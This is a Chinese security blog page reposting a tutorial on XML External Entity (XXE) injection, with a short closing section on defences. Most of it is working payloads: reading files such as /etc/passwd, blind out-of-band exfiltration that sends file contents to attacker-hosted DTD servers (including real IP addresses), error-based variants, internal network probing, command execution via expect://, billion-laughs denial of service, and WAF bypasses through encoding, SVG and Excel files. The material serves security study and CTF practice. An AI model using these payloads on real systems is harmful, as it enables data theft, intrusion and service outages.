
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
        <title>剣の魔王の小屋</title>
        <meta name="author" content="剣の魔王">
        <meta name="description" content="这个网站没有描述">
        <meta name="keywords" content="">
        <link rel="icon" href="image/head.png">
        <script src="https://cdn.staticfile.org/instant.page/5.1.0/instantpage.min.js" type="module"></script>
        <script src="https://cdn.staticfile.org/font-awesome/6.2.0/js/all.min.js"></script>
        
        <link rel="stylesheet" href="/css/fonts.min.css">
        <link rel="stylesheet" href="/css/particlex.css">
        
        <script src="https://cdn.staticfile.org/vue/3.2.33/vue.global.prod.min.js"></script>
    <meta name="generator" content="Hexo 5.4.2"></head>
    <body>
        <div id="loading" style="height:100vh;width:100vw;position:fixed;display:flex;z-index:2147483647;justify-content:space-between;background:#fff;transition:opacity 0.3s ease-out;-webkit-user-select:none;-moz-user-select:none;user-select:none"><div style="position:fixed;height:100vh;width:100vw;display:flex;justify-content:center;align-items:center"><div id="loadcontent" style="width:50vmin;height:50vmin;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px #a3ddfb;text-align:center"><div><h2>LOADING...</h2><p style="word-break:keep-all">加载过慢请开启缓存(浏览器默认开启)</p><div><img alt="loading" src="/loading.gif"></div></div></div></div></div>
        <div id="layout">
            <i data-fa-symbol="calendar-solid" class="fa-solid fa-calendar fa-fw"></i>
            <i data-fa-symbol="bookmark-solid" class="fa-solid fa-bookmark fa-fw"></i>
            <i data-fa-symbol="tags-solid" class="fa-solid fa-tags fa-fw"></i>
            <transition name="into">
                <div v-show="show_page" style="display: -not-none">
                    <div id="menu_show">
                         
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">剣の魔王の小屋</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;about</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;tags</span>
        </a>
        
    </div>
    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div class="curtain" @click="menu_show = !menu_show" v-show="menu_show"></div>
        <div :class="'title'" @click="menu_show = !menu_show">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;剣の魔王の小屋</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">tags</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>
                    </div>
                    <div id="main">
                        
<div class="article">
    <div>
        <h1> </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <svg class="fa-icon"><use xlink:href="#calendar-solid"></use></svg>
            </span>
            2023/9/26
        </span>
        
        
    </div>
    <div class="content" v-pre>
        <p>先放上原文链接：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/20175211lyz/p/11413335.html">https://www.cnblogs.com/20175211lyz/p/11413335.html</a></p>
<p>不得不说写的是真的好又全，所以直接复制过来了。</p>
<h1 id="一、基础知识"><a href="#一、基础知识" class="headerlink" title="一、基础知识"></a>一、基础知识</h1><h2 id="1、XML"><a href="#1、XML" class="headerlink" title="1、XML"></a>1、XML</h2><p><code>XML</code>即 可扩展标记语言（EXtensible Markup Language），是一种标记语言，其标签没有预定义，您需要自行定义标签，是W3C的推荐标准。其于HTML的区别是：</p>
<ul>
<li>HTML 被设计用来显示数据</li>
<li>XML 被设计用来传输和存储数据</li>
</ul>
<p>XML文档结构包括：</p>
<ul>
<li>XML声明</li>
<li>DTD文档类型定义（可选）</li>
<li>文档元素</li>
</ul>
<p>先看一下典型的xml文档：</p>
<p><strong><span id="more"></span></strong></p>
<pre><code class="xml">&lt;!--XML声明--&gt;
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;

&lt;!--DTD，这部分可选的--&gt;          
&lt;!DOCTYPE foo [ 
    &lt;!ELEMENT foo ANY &gt;
    &lt;!ENTITY xxe SYSTEM &quot;file:///c:/windows/win.ini&quot; &gt;
]&gt;

&lt;!--文档元素--&gt;                                                                          
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
</code></pre>
<h2 id="2、DTD概念及声明-引用方式"><a href="#2、DTD概念及声明-引用方式" class="headerlink" title="2、DTD概念及声明/引用方式"></a>2、DTD概念及声明/引用方式</h2><p>DTD：Document Type Definition  即文档类型定义，用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明)，也可以独立的放在一个文件中(外部引用)，由于其支持的数据类型有限，无法对元素或属性的内容进行详细规范，在可读性和可扩展性方面也比不上XML Schema。</p>
<p>DTD一般认为有两种引用或声明方式：</p>
<ul>
<li>1、内部DTD：即对XML文档中的元素、属性和实体的DTD的声明都在XML文档中。</li>
<li>2、外部DTD：即对XML文档中的元素、属性和实体的DTD的声明都在一个独立的DTD文件（.dtd）中。</li>
</ul>
<p>DTD实体有以下几种声明方式</p>
<h3 id="内部实体"><a href="#内部实体" class="headerlink" title="内部实体"></a>内部实体</h3><pre><code class="xml">&lt;!DOCTYPE note [
    &lt;!ENTITY a &quot;admin&quot;&gt;
]&gt;
&lt;note&gt;&amp;a&lt;/note&gt;
&lt;!-- admin --&gt;
</code></pre>
<h3 id="参数实体"><a href="#参数实体" class="headerlink" title="参数实体"></a>参数实体</h3><pre><code class="xml">&lt;!DOCTYPE note&gt; [
    &lt;!ENTITY % b &quot;&lt;!ENTITY b1 &quot;awsl&quot;&gt;&quot;&gt;
    %b;
]&gt;
&lt;note&gt;&amp;b1&lt;/note&gt;
&lt;!-- awsl --&gt;
</code></pre>
<ul>
<li>参数实体用<code>% name</code>申明，引用时用<code>%name;</code>，只能在DTD中申明，DTD中引用。</li>
<li>其余实体直接用<code>name</code>申明，引用时用<code>&amp;name;</code>，只能在DTD中申明，可在xml文档中引用</li>
</ul>
<h3 id="外部实体"><a href="#外部实体" class="headerlink" title="外部实体"></a>外部实体</h3><pre><code class="xml">&lt;!DOCTYPE note&gt; [
    &lt;!ENTITY c SYSTEM &quot;php://filter/read=convert.base64-encode/resource=flag.php&quot;&gt;
]&gt;
&lt;note&gt;&amp;c&lt;/note&gt;
&lt;!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --&gt;
</code></pre>
<p>外部引用可支持http，file等协议，不同的语言支持的协议不同，但存在一些通用的协议，具体内容如下所示：<br> <a target="_blank" rel="noopener" href="https://img2018.cnblogs.com/blog/1270588/202001/1270588-20200115235522292-2141935835.png"><img src="https://img2018.cnblogs.com/blog/1270588/202001/1270588-20200115235522292-2141935835.png" alt="img"></a><br> 上图是默认支持协议，还可以支持其他，如PHP支持的扩展协议有<br> <a target="_blank" rel="noopener" href="https://img2018.cnblogs.com/blog/1270588/202001/1270588-20200115235555856-2031563427.png"><img src="https://img2018.cnblogs.com/blog/1270588/202001/1270588-20200115235555856-2031563427.png" alt="img"></a></p>
<h3 id="外部参数实体"><a href="#外部参数实体" class="headerlink" title="外部参数实体"></a>外部参数实体</h3><pre><code class="xml">&lt;!DOCTYPE note&gt; [
    &lt;!ENTITY % d SYSTEM &quot;http://47.106.143.26/xml.dtd&quot;&gt;
    %d;
]&gt;
&lt;note&gt;&amp;d1&lt;/note&gt;
&lt;!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== --&gt;
</code></pre>
<p><a target="_blank" rel="noopener" href="http://47.106.143.26/xml.dtd">http://47.106.143.26/xml.dtd</a></p>
<pre><code class="xml">&lt;!-- http://47.106.143.26/xml.dtd --&gt;
&lt;!ENTITY d1 SYSTEM &quot;data://text/plain;base64,Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA==&quot;&gt;
</code></pre>
<h1 id="二、XML外部实体注入-XML-External-Entity"><a href="#二、XML外部实体注入-XML-External-Entity" class="headerlink" title="二、XML外部实体注入(XML External Entity)"></a>二、XML外部实体注入(XML External Entity)</h1><h2 id="1、任意文件读取"><a href="#1、任意文件读取" class="headerlink" title="1、任意文件读取"></a>1、任意文件读取</h2><p>最简单也是最常用的利用方式<br> 一般xxe利用分为两大场景：有回显和无回显。有回显的情况可以直接在页面中看到Payload的执行结果或现象，无回显的情况又称为Blind XXE，可以使用外带数据通道提取数据。</p>
<h3 id="有回显"><a href="#有回显" class="headerlink" title="有回显"></a>有回显</h3><h4 id="恶意引入外部实体"><a href="#恶意引入外部实体" class="headerlink" title="恶意引入外部实体"></a>恶意引入外部实体</h4><p>直接读靶机文件</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot; ?&gt;
&lt;!DOCTYPE foo [ 
&lt;!ENTITY rabbit SYSTEM &quot;file:///flag&quot; &gt;
]&gt;
&lt;user&gt;&lt;username&gt;&amp;rabbit;&lt;/username&gt;&lt;password&gt;123&lt;/password&gt;&lt;/user&gt;
</code></pre>
<h4 id="恶意引入外部参数实体"><a href="#恶意引入外部参数实体" class="headerlink" title="恶意引入外部参数实体"></a>恶意引入外部参数实体</h4><pre><code class="xml">&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE test [
    &lt;!ENTITY % file SYSTEM &quot;http://vps-ip/hack.dtd&quot;&gt;
    %file;
]&gt;
&lt;test&gt;&amp;hhh;&lt;/test&gt;
</code></pre>
<pre><code class="xml">&lt;!ENTITY hhh SYSTEM &#39;file:///etc/passwd&#39;&gt;
</code></pre>
<h3 id="无回显"><a href="#无回显" class="headerlink" title="无回显"></a>无回显</h3><h4 id="OOB"><a href="#OOB" class="headerlink" title="OOB"></a>OOB</h4><p>先使用php://filter获取目标文件的内容，然后将内容以http请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx。</p>
<pre><code class="xml">&lt;!DOCTYPE updateProfile [
    &lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=./target.php&quot;&gt;
    &lt;!ENTITY % dtd SYSTEM &quot;http://xxx.xxx.xxx/evil.dtd&quot;&gt;
    %dtd;
    %send;
]&gt;
</code></pre>
<p>evil.dtd的内容，内部的%号要进行实体编码成&amp;#x25。</p>
<pre><code class="xml">&lt;!ENTITY % all
    &quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#39;http://xxx.xxx.xxx/?data=%file;&#39;&gt;&quot;
&gt;
%all;
</code></pre>
<p>访问接受数据的服务器中的日志信息，可以看到经过base64编码过的数据，解码后便可以得到数据。</p>
<h4 id="基于报错"><a href="#基于报错" class="headerlink" title="基于报错"></a>基于报错</h4><p>以下内容皆出自JrXnm师傅博客<br> <a target="_blank" rel="noopener" href="https://blog.szfszf.top/tech/blind-xxe-%E8%AF%A6%E8%A7%A3-google-ctf-%E4%B8%80%E9%81%93%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90/">Blind XXE 详解 + Google CTF 一道题目分析</a></p>
<blockquote>
<p>基于报错的原理和OOB类似，OOB通过构造一个带外的url将数据带出，而基于报错是构造一个错误的url并将泄露文件内容放在url中，通过这样的方式返回数据。<br> 所以和OOB的构造方式几乎只有url出不同，其他地方一模一样。</p>
</blockquote>
<h5 id="通过引入服务器文件"><a href="#通过引入服务器文件" class="headerlink" title="通过引入服务器文件"></a>通过引入服务器文件</h5><pre><code class="xml">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE message [
    &lt;!ENTITY % remote SYSTEM &quot;http://blog.szfszf.top/xml.dtd&quot;&gt;
    &lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///flag&quot;&gt;
    %remote;
    %send;
]&gt;
&lt;message&gt;1234&lt;/message&gt;
</code></pre>
<p>xml.dtd</p>
<pre><code class="xml">&lt;!-- xml.dtd --&gt;
&lt;!ENTITY % start &quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#39;file:///hhhhhhh/%file;&#39;&gt;&quot;&gt;
%start;
</code></pre>
<h5 id="通过引入本地文件"><a href="#通过引入本地文件" class="headerlink" title="通过引入本地文件"></a>通过引入本地文件</h5><p>如果目标主机的防火墙十分严格，不允许我们请求外网服务器dtd呢？由于XML的广泛使用，其实在各个系统中已经存在了部分DTD文件。按照上面的理论，我们只要是从外部引入DTD文件，并在其中定义一些实体内容就行。</p>
<pre><code class="php-template">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE message [
    &lt;!ENTITY % remote SYSTEM &quot;/usr/share/yelp/dtd/docbookx.dtd&quot;&gt;
    &lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///flag&quot;&gt;
    &lt;!ENTITY % ISOamso &#39;
        &lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; send SYSTEM &amp;#x27;file://hhhhhhhh/?&amp;#x25;file;&amp;#x27;&gt;&quot;&gt;
        &amp;#x25;eval;
        &amp;#x25;send;
    &#39;&gt; 
    %remote;
]&gt;
&lt;message&gt;1234&lt;/message&gt;
</code></pre>
<p>我们仔细看一下很好理解，第一个调用的参数实体是%remote，在/usr/share/yelp/dtd/docbookx.dtd文件中调用了%ISOamso;，在ISOamso定义的实体中相继调用了eval、和send</p>
<h5 id="嵌套参数实体"><a href="#嵌套参数实体" class="headerlink" title="嵌套参数实体"></a>嵌套参数实体</h5><blockquote>
<p>我发现，虽然W3C协议是不允许在内部的实体声明中引用参数实体，但是很多XML解析器并没有很好的执行这个检查。几乎所有XML解析器能够发现如下这种两层嵌套式的</p>
</blockquote>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE message [
    &lt;!ENTITY % file SYSTEM &quot;file:///etc/passwd&quot;&gt;  
    &lt;!ENTITY % start &quot;&lt;!ENTITY &amp;#x25; send SYSTEM &#39;http://myip/?%file;&#39;&gt;&quot;&gt;
    %start;
    %send;
]&gt;
&lt;message&gt;10&lt;/message&gt;
</code></pre>
<p>基于报错的三层嵌套参数实体XXE</p>
<pre><code class="php-template">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE message [
    &lt;!ELEMENT message ANY&gt;
    &lt;!ENTITY % para1 SYSTEM &quot;file:///flag&quot;&gt;
    &lt;!ENTITY % para &#39;
        &lt;!ENTITY &amp;#x25; para2 &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///&amp;#x25;para1;&amp;#x27;&gt;&quot;&gt;
        &amp;#x25;para2;
    &#39;&gt;
    %para;
]&gt;
&lt;message&gt;10&lt;/message&gt;
</code></pre>
<p><a target="_blank" rel="noopener" href="https://img2018.cnblogs.com/blog/1270588/202001/1270588-20200115235505350-206599067.png"><img src="https://img2018.cnblogs.com/blog/1270588/202001/1270588-20200115235505350-206599067.png" alt="img"></a></p>
<h2 id="2、内网探测"><a href="#2、内网探测" class="headerlink" title="2、内网探测"></a>2、内网探测</h2><p>和读文件差不多，只不过把URI改成内网机器地址</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;        
&lt;!DOCTYPE foo [ 
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY rabbit SYSTEM &quot;http://127.0.0.1/1.txt&quot; &gt;
]&gt;
&lt;user&gt;&lt;firstname&gt;&amp;rabbit;&lt;/firstname&gt;&lt;lastname&gt;666&lt;/lastname&gt;&lt;/user&gt;
</code></pre>
<h2 id="3、RCE"><a href="#3、RCE" class="headerlink" title="3、RCE"></a>3、RCE</h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/web/177979.html">XXE漏洞利用技巧：从XML到远程代码执行</a><br> 这种情况很少发生，但有些情况下攻击者能够通过XXE执行代码，这主要是由于配置不当/开发内部应用导致的。如果我们足够幸运，并且PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上，那么我们就可以执行如下的命令：</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE GVI [ &lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;expect://id&quot; &gt;]&gt;
&lt;catalog&gt;
   &lt;core id=&quot;test101&quot;&gt;
      &lt;author&gt;John, Doe&lt;/author&gt;
      &lt;title&gt;I love XML&lt;/title&gt;
      &lt;category&gt;Computers&lt;/category&gt;
      &lt;price&gt;9.99&lt;/price&gt;
      &lt;date&gt;2018-10-01&lt;/date&gt;
      &lt;description&gt;&amp;xxe;&lt;/description&gt;
   &lt;/core&gt;
&lt;/catalog&gt;
</code></pre>
<p>响应：</p>
<pre><code class="smalltalk">&#123;&quot;error&quot;: &quot;no results for description uid=0(root) gid=0(root) groups=0(root)...
</code></pre>
<h2 id="4、DOS"><a href="#4、DOS" class="headerlink" title="4、DOS"></a>4、DOS</h2><p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/194112.html">XXE萌新进阶全攻略</a></p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE lolz [
  &lt;!ENTITY lol &quot;lol&quot;&gt;
  &lt;!ENTITY lol2 &quot;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;
  &lt;!ENTITY lol3 &quot;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;
  &lt;!ENTITY lol4 &quot;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&quot;&gt;
  &lt;!ENTITY lol5 &quot;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&amp;lol4;&quot;&gt;
  &lt;!ENTITY lol6 &quot;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&quot;&gt;
  &lt;!ENTITY lol7 &quot;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&quot;&gt;
  &lt;!ENTITY lol8 &quot;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&quot;&gt;
  &lt;!ENTITY lol9 &quot;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&quot;&gt;
]&gt;
&lt;lolz&gt;&amp;lol9;&lt;/lolz&gt;
</code></pre>
<p>此测试可以在内存中将小型 XML 文档扩展到超过 3GB 而使服务器崩溃。<br> 亦或者，如果目标是UNIX系统，</p>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [ 
  &lt;!ELEMENT foo ANY &gt;
  &lt;!ENTITY xxe SYSTEM &quot;file:///dev/random&quot; &gt;]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
</code></pre>
<p>如果 XML 解析器尝试使用<code>/dev/random</code>文件中的内容来替代实体，则此示例会使服务器（使用 UNIX 系统）崩溃。</p>
<h1 id="三、绕过姿势"><a href="#三、绕过姿势" class="headerlink" title="三、绕过姿势"></a>三、绕过姿势</h1><p>参考cl4y师傅博客<a target="_blank" rel="noopener" href="http://www.cl4y.top/xxe%E7%AC%94%E8%AE%B0/">xxe笔记</a><br> <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/4059">绕过WAF保护的XXE</a></p>
<h2 id="ENTITY-SYSTEM-file等关键词被过滤"><a href="#ENTITY-SYSTEM-file等关键词被过滤" class="headerlink" title="ENTITY``SYSTEM``file等关键词被过滤"></a><code>ENTITY``SYSTEM``file</code>等关键词被过滤</h2><p>使用编码方式绕过：UTF-16BE<br> <code>cat payload.xml | iconv -f utf-8 -t utf-16be &gt; payload.8-16be.xml</code></p>
<p>若http被过滤，可以</p>
<h2 id="data-协议绕过"><a href="#data-协议绕过" class="headerlink" title="data://协议绕过"></a>data://协议绕过</h2><pre><code class="xml">&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE test [
    &lt;!ENTITY % a &quot; &lt;!ENTITY %  b SYSTEM &#39;http://118.25.14.40:8200/hack.dtd&#39;&gt; &quot;&gt; 
    %a;
    %b;
]&gt;
&lt;test&gt;&amp;hhh;&lt;/test&gt;
</code></pre>
<h2 id="file-协议加文件上传"><a href="#file-协议加文件上传" class="headerlink" title="file://协议加文件上传"></a>file://协议加文件上传</h2><pre><code class="xml">&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE test [
    &lt;!ENTITY % a SYSTEM &quot;file:///var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg&quot;&gt;
    %a;
]&gt;
&lt;!--上传文件--&gt;
&lt;!ENTITY % b SYSTEM &#39;http://118.25.14.40:8200/hack.dtd&#39;&gt;
</code></pre>
<h2 id="php-filter协议加文件上传"><a href="#php-filter协议加文件上传" class="headerlink" title="php://filter协议加文件上传"></a>php://filter协议加文件上传</h2><pre><code class="xml">&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE test [
    &lt;!ENTITY % a SYSTEM &quot;php://filter/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg&quot;&gt;
    %a;
]&gt;
    &lt;test&gt;
        &amp;hhh;
    &lt;/test&gt;

&lt;!--上传文件--&gt;
&lt;!ENTITY hhh SYSTEM &#39;php://filter/read=convert.base64-encode/resource=./flag.php&#39;&gt;
</code></pre>
<pre><code class="xml">&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE test [
    &lt;!ENTITY % a SYSTEM &quot;php://filter/read=convert.base64-decode/resource=/var/www/uploads/cfcd208495d565ef66e7dff9f98764da.jpg&quot;&gt;
    %a;
]&gt;
    &lt;test&gt;
        &amp;hhh;
    &lt;/test&gt;
&lt;!--上传文件--&gt;
PCFFTlRJVFkgaGhoIFNZU1RFTSAncGhwOi8vZmlsdGVyL3JlYWQ9Y29udmVydC5iYXNlNjQtZW5jb2RlL3Jlc291cmNlPS4vZmxhZy5waHAnPg==
</code></pre>
<h1 id="四、利用场景"><a href="#四、利用场景" class="headerlink" title="四、利用场景"></a>四、利用场景</h1><h2 id="svg"><a href="#svg" class="headerlink" title="svg"></a>svg</h2><pre><code class="xml">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;!DOCTYPE note [
&lt;!ENTITY file SYSTEM &quot;file:///proc/self/cwd/flag.txt&quot; &gt;
]&gt;
&lt;svg height=&quot;100&quot; width=&quot;1000&quot;&gt;
  &lt;text x=&quot;10&quot; y=&quot;20&quot;&gt;&amp;file;&lt;/text&gt;
&lt;/svg&gt;
</code></pre>
<p>tips:从当前文件夹读取文件可以使用<code>/proc/self/cwd</code></p>
<h2 id="excel"><a href="#excel" class="headerlink" title="excel"></a>excel</h2><p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/3741">利用EXCEL进行XXE攻击</a><br> 首先用excel创建一个空白的xlsx，然后解压</p>
<pre><code class="bash">mkdir XXE &amp;&amp; cd XXE
unzip ../XXE.xlsx
</code></pre>
<p>将<code>[Content_Types].xml</code>改成恶意xml，再压缩回去</p>
<pre><code class="bash">zip -r ../poc.xlsx *
</code></pre>
<h1 id="五、XXE防御"><a href="#五、XXE防御" class="headerlink" title="五、XXE防御"></a>五、XXE防御</h1><p><a target="_blank" rel="noopener" href="https://security.tencent.com/index.php/blog/msg/69">未知攻焉知防——XXE漏洞攻防</a></p>
<ul>
<li>方案一、使用开发语言提供的禁用外部实体的方法<br> PHP：libxml_disable_entity_loader(true);<br> 其他语言:<a target="_blank" rel="noopener" href="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet">https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet</a></li>
<li>方案二、过滤用户提交的XML数据<br> 关键词：<code>，</code>,<code>SYSTEM</code>和<code>PUBLIC</code>。</li>
</ul>

    </div>
    
    
</div>
                         
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 20xx - 2024 剣の魔王の小屋
            <span class="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            @剣の魔王
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a></div>
        
    </div>
</footer>
                    </div>
                </div>
            </transition>
            <div id="img_show">
                <img id="img_content" alt="img_show">
            </div>

			<canvas
    id="fireworks"
    style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; pointer-events: none; z-index: 32767"></canvas>
	<script src="https://s4.zstatic.net/ajax/libs/animejs/3.2.1/anime.min.js"></script>
	<script src="/js/fireworks.min.js"></script>
	
        </div>
        <script src="https://cdn.staticfile.org/highlight.js/11.5.1/highlight.min.js"></script>
        <script src="/js/particlex.js"></script>
        <script src="/js/showimg.js"></script>
        

    </body>
</html>